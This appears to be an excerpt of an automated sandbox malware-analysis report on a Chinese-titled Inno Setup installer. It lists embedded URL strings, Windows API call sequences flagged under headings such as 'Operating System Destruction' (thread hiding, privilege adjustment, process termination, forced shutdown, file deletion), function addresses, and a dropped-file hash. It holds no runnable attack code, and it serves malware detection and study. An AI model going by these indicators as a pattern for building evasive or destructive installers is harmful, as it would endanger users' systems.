Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr; String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr; String found in binary or memory: http://ocsp.digicert.com0A
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr; String found in binary or memory: http://ocsp.digicert.com0C
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr; String found in binary or memory: http://ocsp.digicert.com0H
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr; String found in binary or memory: http://ocsp.digicert.com0I
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr; String found in binary or memory: http://ocsp.digicert.com0X
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr; String found in binary or memory: http://www.digicert.com/CPS0
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr; String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-R44JL.tmp.6.dr; String found in binary or memory: http://www.metalinker.org/
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-R44JL.tmp.6.dr; String found in binary or memory: http://www.metalinker.org/basic_string::_M_construct
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-R44JL.tmp.6.dr; String found in binary or memory: https://aria2.github.io/
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-R44JL.tmp.6.dr; String found in binary or memory: https://aria2.github.io/Usage:
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-R44JL.tmp.6.dr; String found in binary or memory: https://github.com/aria2/aria2/issues
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-R44JL.tmp.6.dr; String found in binary or memory: https://github.com/aria2/aria2/issuesReport
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exe; String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, 00000000.00000003.2133531361.0000000002C60000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.exe, 00000000.00000003.2134065444.000000007F0AB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000000.2135961288.0000000000861000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000006.00000000.2156757019.0000000000D1D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.0.dr; String found in binary or memory: https://www.innosetup.com/
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, 00000000.00000003.2133531361.0000000002C60000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.exe, 00000000.00000003.2134065444.000000007F0AB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000000.2135961288.0000000000861000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000006.00000000.2156757019.0000000000D1D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.0.dr; String found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp; Process information set: 01 00 00 00

System Summary

Source: update.vac.2.dr; Static PE information: section name: .=~
Source: hrsw.vbc.6.dr; Static PE information: section name: .=~
Source: update.vac.6.dr; Static PE information: section name: .=~
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp; Code function: 6_2_6CA93886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6CA93886
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp; Code function: 6_2_6CC15120 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle,6_2_6CC15120
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp; Code function: 6_2_6CA93C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6CA93C62
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp; Code function: 6_2_6CC15D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,6_2_6CC15D60
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp; Code function: 6_2_6CA93D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6CA93D18
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp; Code function: 6_2_6CA93D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6CA93D62
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp; Code function: 6_2_6CA939CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6CA939CF
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp; Code function: 6_2_6CA93A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6CA93A6A
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp; Code function: 6_2_6CA91950: CreateFileA,DeviceIoControl,CloseHandle,6_2_6CA91950
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp; Code function: 6_2_6CA94754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor,6_2_6CA94754
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CA94754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor,6_2_6CA94754
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CA947546_2_6CA94754
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CAA4A276_2_6CAA4A27
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CC118806_2_6CC11880
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CC16A436_2_6CC16A43
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CC76CE06_2_6CC76CE0
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCE4DE06_2_6CCE4DE0
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCC6D106_2_6CCC6D10
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CC62EC96_2_6CC62EC9
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CC9AEEF6_2_6CC9AEEF
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCCEEF06_2_6CCCEEF0
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CC48EA16_2_6CC48EA1
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCDC8D06_2_6CCDC8D0
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CC948966_2_6CC94896
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCE48706_2_6CCE4870
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCBE8106_2_6CCBE810
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCD68206_2_6CCD6820
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCE69996_2_6CCE6999
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCD89506_2_6CCD8950
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CC489726_2_6CC48972
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCC69006_2_6CCC6900
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCDA9306_2_6CCDA930
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCD4AA06_2_6CCD4AA0
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCA0A526_2_6CCA0A52
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCDEBC06_2_6CCDEBC0
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CC50BCA6_2_6CC50BCA
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCBAB906_2_6CCBAB90
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CC60B666_2_6CC60B66
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCCE4D06_2_6CCCE4D0
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCD44896_2_6CCD4489
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCA84AC6_2_6CCA84AC
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCC45D06_2_6CCC45D0
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCC25806_2_6CCC2580
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCCC5806_2_6CCCC580
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCB25216_2_6CCB2521
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCD85206_2_6CCD8520
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCE46C06_2_6CCE46C0
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCDE6006_2_6CCDE600
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CC4C7CF6_2_6CC4C7CF
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCE67C06_2_6CCE67C0
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCAC7F36_2_6CCAC7F3
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCD67A06_2_6CCD67A0
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCCE0E06_2_6CCCE0E0
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCC00206_2_6CCC0020
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCDC2A06_2_6CCDC2A0
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCD82006_2_6CCD8200
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCE5D906_2_6CCE5D90
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CC97D436_2_6CC97D43
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCC3D506_2_6CCC3D50
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCC9E806_2_6CCC9E80
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCA1F116_2_6CCA1F11
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCD78C86_2_6CCD78C8
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCB589F6_2_6CCB589F
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCC99F06_2_6CCC99F0
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCBDAD06_2_6CCBDAD0
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCC1AA06_2_6CCC1AA0
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCBFA506_2_6CCBFA50
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CC6540A6_2_6CC6540A
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCCF5C06_2_6CCCF5C0
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CC8F5EC6_2_6CC8F5EC
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCC96E06_2_6CCC96E0
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCDF6406_2_6CCDF640
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCBB6506_2_6CCBB650
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCE37C06_2_6CCE37C0
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCE97006_2_6CCE9700
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CC630926_2_6CC63092
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCCF0506_2_6CCCF050
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCC71F06_2_6CCC71F0
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCCD2806_2_6CCCD280
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCCD3806_2_6CCCD380
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCD6AF06_2_6CCD6AF0
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCD37506_2_6CCD3750
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F481EC
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F881C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F74250
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F98240
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F9C3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F904C8
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F78650
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F7C950
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F50943
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F78C20
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F94EA0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F90E00
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F610AC
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F8D089
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F7D1D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F991C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F85180
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F91120
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F9D2C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F653F3
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F053CF
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F954D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F4D496
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F9D470
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F01572
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F91550
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F8D6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F59652
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F097CA
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F19766
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F9D9E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F01AA1
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F85E80
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F85F80
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F1E00A
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F822E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00FA2300
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F6E49F
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F825F0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F766D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F7A6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F9E990
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F82A80
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F5AB11
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F86CE0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F870D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F7B180
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F6B121
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F97200
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F2B3E4
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F9F3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F8F3A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F8F420
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F77410
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F9F599
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F93530
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00FA351A
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F7F500
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00FA3601
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F977C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F73790
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F2F8E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F7F910
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F87AF0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F53AEF
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F1BAC9
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F1BC92
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F87C50
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F7FDF0
Source: Joe Sandbox View | Dropped File: C:\Program Files (x86)\Windows NT\hrsw.vbc 05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process token adjusted: Security
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: String function: 6CCE6F10 appears 727 times
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: String function: 6CC49240 appears 53 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 00F01E40 appears 151 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 00F9FB10 appears 723 times
